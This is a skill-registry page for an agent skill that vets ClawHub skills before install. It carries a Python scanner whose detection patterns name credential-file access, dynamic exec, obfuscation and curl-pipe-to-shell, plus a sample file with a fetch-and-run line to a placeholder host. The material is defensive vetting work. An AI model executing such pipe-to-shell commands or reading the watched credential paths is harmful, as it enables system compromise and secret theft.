clawhub-skill-vetting
Total installs: 52
Weekly installs: 52
Site-wide rank: #7538
Install command
npx skills add https://github.com/hugomrtz/skill-vetting-clawhub --skill clawhub-skill-vetting
Installs by agent
- gemini-cli: 50
- github-copilot: 50
- codex: 50
- amp: 50
- cline: 50
- kimi-cli: 50
Skill documentation
ClawHub Skill Vetting
Overview
Apply a strict, security-first vetting workflow before installing any ClawHub skill. Prioritize code review, permission scope, domain listing, and risk scoring.
Workflow
- Source check: author reputation, stars/downloads, last update, reviews.
- Code review (MANDATORY): scan all files for exfiltration, secrets access, eval/exec, obfuscation.
- Permission scope: files, commands, network; confirm minimal scope.
- Recent activity: detect suspicious bursts.
- Community check: Discord/GitHub Discussions.
- Install safely: sandbox + inspect permissions.
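One way to automate a first pass of the mandatory code-review step and the domain listing, as an added example (not the skill's own code, and not taken from references/vetting-guide.md). The pattern set, the report layout and the sample files are assumptions made for this illustration.

```python
import re
from pathlib import Path

# Illustrative red-flag patterns (assumed here; not copied from references/vetting-guide.md).
RED_FLAGS = {
    "dynamic-exec": re.compile(r"\b(?:eval|exec)\s*\(|\bos\.system\s*\(|\bsubprocess\.|child_process"),
    "secrets-access": re.compile(r"\.ssh/|\.aws/credentials|\bos\.environ\b|\bprocess\.env\b"),
    "obfuscation": re.compile(r"[A-Za-z0-9+/]{120,}={0,2}|(?:\\x[0-9a-fA-F]{2}){16,}|\bb64decode\s*\(|\batob\s*\("),
    "pipe-to-shell": re.compile(r"\b(?:curl|wget)\b[^\n|]*\|\s*(?:ba)?sh\b"),
}
HOST = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)

def scan_text(name, text):
    """Return (findings, hosts) for the contents of one file."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for flag, rx in RED_FLAGS.items():
            if rx.search(line):
                findings.append((name, lineno, flag, line.strip()[:80]))
    return findings, {h.lower().rstrip(".") for h in HOST.findall(text)}

def scan_skill(root):
    """Scan every file under root; files that cannot be read as text are listed, not skipped."""
    report = {"findings": [], "domains": set(), "unreviewed": []}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        try:
            text = path.read_text(encoding="utf-8")
        except (UnicodeDecodeError, OSError):
            report["unreviewed"].append(rel)  # binary or unreadable: needs manual review
            continue
        found, hosts = scan_text(rel, text)
        report["findings"] += found
        report["domains"] |= hosts
    return report

# Constructed sample skill contents, for demonstration only.
SAMPLE = {
    "SKILL.md": "Fetches docs from https://docs.example.com/api\n",
    "scripts/setup.sh": "curl -s https://cdn.example.net/i.sh | sh\n",
    "scripts/run.py": "import os\ntoken = os.environ['API_TOKEN']\nexec(payload)\n",
}

if __name__ == "__main__":
    for name, text in SAMPLE.items():
        print(name, scan_text(name, text))
```

Pattern hits only prioritize the manual review; files listed under `unreviewed` still have to be opened by hand.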
Reference
Use references/vetting-guide.md for the full checklist, commands, red flags, confidence scoring, and report template.
Output expectations
- Produce the SKILL VETTING REPORT format.
- Provide a go/no-go recommendation with reasons.
- If unclear, recommend sandbox install only or reject.
- Call out any red flags explicitly.
- Include a confidence score and threshold.